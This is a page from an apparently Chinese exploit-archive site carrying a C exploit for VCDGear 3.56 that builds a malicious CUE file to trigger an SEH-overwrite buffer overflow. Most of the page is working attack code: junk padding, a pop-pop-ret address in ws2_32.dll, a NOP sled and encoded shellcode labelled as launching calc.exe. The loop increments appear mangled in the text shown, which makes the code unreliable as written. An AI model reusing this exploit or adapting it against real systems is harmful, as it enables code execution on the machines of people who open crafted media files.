首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit


http://www.gipsky.com/
/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
Discovered by: InTeL
Auther: InTeL
Attack Vector: SEH overwrite
Type: Local
Tested on Win2k SP4 (English)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: VCDGear v3.56 build 050213
Website: www.vcdgear.com
Description:

"VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG,
correct MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has
grown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow
different machines to process and generate output that is compatible between one another.

Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]

Greetz: erazerz, m03, devcode, #pen15
*/

#include <stdlib.h>
#include <stdio.h>

// Exec Calc.exe Scode
unsigned char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";


int main(int argc, char *argv[])
{
FILE *handle;

if(argc < 2) {
printf("0day VCDGear exploit\n");
printf("Usage: %s <output CUE file>", argv[0]);
return 0;
}

if(!(handle = fopen(argv[1], "w"))) {
printf("[ ] Error");
return 0;
}

fputs("FILE \"", handle);
for (int i=0;i<324;i ) \
fputs("A", handle);

fputs("\xeb\x32\x90\x90", handle);
fputs("\x3a\x1f\x03\x75", handle); //pop edi, pop esi, retn in ws2_32.dll (English / 5.0.2195.6601)
for (i=0;i<200;i )
fputs("\x90", handle);

fputs((char *)scode, handle);
fputs("\" BINARY\n", handle);
fputs(" TRACK 01 MODE2/2352\n", handle);
fputs(" INDEX 01 00:00:00\n", handle);

fclose(handle);

printf("[ ] File successfully created");

return 0;
}

[2007-04-13]
<< Ettercap-NG 0.7.3 Remote Denial of Service Exploit IE NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8